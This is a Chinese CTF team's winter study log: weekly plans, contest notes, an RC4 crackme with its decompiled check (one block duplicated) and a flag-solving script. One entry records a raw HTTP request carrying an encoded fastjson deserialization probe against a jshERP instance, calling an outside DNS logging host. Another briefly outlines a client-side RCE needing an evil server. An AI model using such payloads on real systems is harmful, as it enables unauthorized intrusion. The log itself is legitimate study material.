![cover](http://img.cdn.guozk.cn/usr/uploads/2023/2024%208%2017/20240817-181312.jpg)
寒假学习记录
#逆向RC4
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
typedef unsigned long ULONG;
void init(unsigned char *s, unsigned char *key, unsigned long Len) //初始化函数
{
int i =0, j = 0;
char k[256] = {0};
unsigned char tmp = 0;
for (i=0;i<256;i++) {
s[i] = i;
k[i] = key[i%Len];
}
for (i=0; i<256; i++) {
j=(j+s[i]+k[i])%256;
tmp = s[i];
s[i] = s[j]; //交换s[i]和s[j]
s[j] = tmp;
}
}
void crypt(unsigned char *s, unsigned char *Data, unsigned long Len) //加解密
{
int i = 0, j = 0, t = 0;
unsigned long k = 0;
unsigned char tmp;
for(k=0;k<Len;k++) {
i=(i+1)%256;
j=(j+s[i])%256;
tmp = s[i];
s[i] = s[j]; //交换s[x]和s[y]
s[j] = tmp;
t=(s[i]+s[j])%256;
Data[k] ^= s[t];
}
}
int main()
{
char i;
int a = 0;
unsigned char s[256] = {0}; //S-box
char key[256] = {"12345678"};
char pData[512] = {-17,-64,87,-117,125,-39,-18,-46,-59,114,100,-85,-7,8,105,-63,45,-22,-12,36,-84,27};
char input[512] = {};
ULONG len = strlen(pData);
printf("please input your flag:\n");
while((i = getchar())!='\n')
{
input[a] = i;
a++;
}
init(s,(unsigned char *)key,strlen(key)); //已经完成了初始化
crypt(s,(unsigned char *)pData,len);//加密
if(!strcmp(input,pData))
printf("Good!");
else
printf("ERROR!");
return 0;
}
原文
时间进度
1月20日—1月28日
制定学习计划
C语言 · 启航
施行学习计划
设置学习打卡机制
22日晚观看赛前说明会
靶场试炼
安排任务
题目讲解
开发飞书机器人实现自动递交flag验证
RE手
逆向、汇编学习进展
PWN手
Pwn、Linux学习进展
暂时无法在飞书文档外展示此内容
召开一周总结
漏洞挖掘
发掘安卓底层漏洞,上报MISRC并获得致歉。
战队声望
在CTF知名网站获悉,GZYSEC排名
赛事状况
期间参加獬豸杯,据悉此次电子取证大赛由江西警察学院科技与信息安全系火炬木攻防实验室等单位主办
受长亭科技邀请参与 Real World CTF 6(th) 体验赛
EvilMQ
漏洞原理类似 ActiveMQ, 但是是 Client 端 RCE, 需要自己构造一个 Evil Server
https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
几个关键点
https://github.com/apache/inlong/blob/9d745b8449b8f57573668d7c332a71179027be20/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/netty/NettyClient.java#L349
https://github.com/apache/inlong/blob/master/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/utils/MixUtils.java#L70
1月29日—2月4日
复现
搭建赛事复现环境
笔记
参与编写逆向笔记
Hgame
29日参与Hgame
西湖
30日参加西湖论剑大赛
RE
web
GET /jshERP-boot/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%73%61%74%76%65%72%70%76%79%6e%2e%64%67%72%68%33%2e%63%6e%22%7d&column=createTime&order=desc&field=id,,,action,loginName,username,userType,roleName,orgAbr,leaderFlagStr,phonenum,userBlngOrgaDsplSeq,status¤tPage=1&pageSize=10 HTTP/1.1
Host: 1.14.108.193:31882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Access-Token: ea4b6df790ab427d9564d16cf7fee026_0
Connection: close
Referer: http://1.14.108.193:31882/system/user
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583502; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583724
测试赛
自建靶机:Web测试
2024.0xctf.org.cn
2月05日—2月11日
总结
自主学习总结
逆向手
「本周做的哪些事情【简要总结】
web基础的了解,汇编的了解,内存占用,C语言前八道二级设计题以及文件的打开,高级进阶函数和树的结构和堆栈,高数的前七章节的复习,西湖赛事题目的了解以及复盘虽然说现在还没怎么懂
PWN手
密码手
除夕红包赛
2月9日红包赛
代码能力测试
2月10日代码能力测试
2月12日—2月18日
铁人三项环境复现
2月15日根据铁人三项杯搭建环境复现
逆向
放入ida,发现众多函数,查找字符串定位函数。
v26 = 0;
v4 = 1;
v5 = 4;
v6 = 14;
v7 = 10;
v8 = 5;
v9 = 36;
v10 = 23;
v11 = 42;
v12 = 13;
v13 = 19;
v14 = 28;
v15 = 13;
v16 = 27;
v17 = 39;
v18 = 48;
v19 = 41;
v20 = 42;
v21 = 26;
v22 = 20;
v23 = 59;
v24 = 4;
v25 = 0;
printf("please enter flag:");
sub_411136();
while ( 1 )
{
getch();
v1 = sub_411136();
v27[v26] = v1;
if ( !v1 || v27[v26] == 13 )
break;
if ( v27[v26] == 8 )
{
printf("\b\b");
sub_411136();
--v26;
}
else
{
printf("%c", v27[v26]);
sub_411136();
++v26;
}
}
v3 = 0;
for ( i = 0; i < 17; ++i )
{
if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
v3 = 1;
}
if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
v3 = 1;
v27[v26] = 0;
printf("\r\n");v26 = 0;
v4 = 1;
v5 = 4;
v6 = 14;
v7 = 10;
v8 = 5;
v9 = 36;
v10 = 23;
v11 = 42;
v12 = 13;
v13 = 19;
v14 = 28;
v15 = 13;
v16 = 27;
v17 = 39;
v18 = 48;
v19 = 41;
v20 = 42;
v21 = 26;
v22 = 20;
v23 = 59;
v24 = 4;
v25 = 0;
printf("please enter flag:");
sub_411136();
while ( 1 )
{
getch();
v1 = sub_411136();
v27[v26] = v1;
if ( !v1 || v27[v26] == 13 )
break;
if ( v27[v26] == 8 )
{
printf("\b\b");
sub_411136();
--v26;
}
else
{
printf("%c", v27[v26]);
sub_411136();
++v26;
}
}
v3 = 0;
for ( i = 0; i < 17; ++i )
{
if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
v3 = 1;
}
if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
v3 = 1;
v27[v26] = 0;
printf("\r\n");
将字符串按照数组v4的数字取出与v27比较,如果相等,则success。
v4数组即最上方连续的一串整形变量,(1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42,26,20,59)
,相应的字符串为KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
,v27最后几位也就是1024}
,根据过程编写脚本。
flag = ''
st = 'KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
index = (1, 4, 14, 10, 5, 36, 23, 42, 13, 19, 28, 13, 27, 39, 48, 41, 42, 26, 20, 59)
for n in range(0, 17):
flag = flag + st[index[n] - 1:index[n]]
print(flag)
flag:KEY{e2s6ry3r5s8f61024}
研究C Sharp逆向工程
VNCTF
2月17日参加VNCTF
2月19日—2月25日
总结
我最近自从西湖比完之后都是准备专升本的英语备考当中,从新概念一开始学起,每天背单词记笔记、听听力、默写单词、句子、回译文章,偶而也会打打一些热身赛CTF水水,最近还给他们安排了一下目标。
目前的学习计划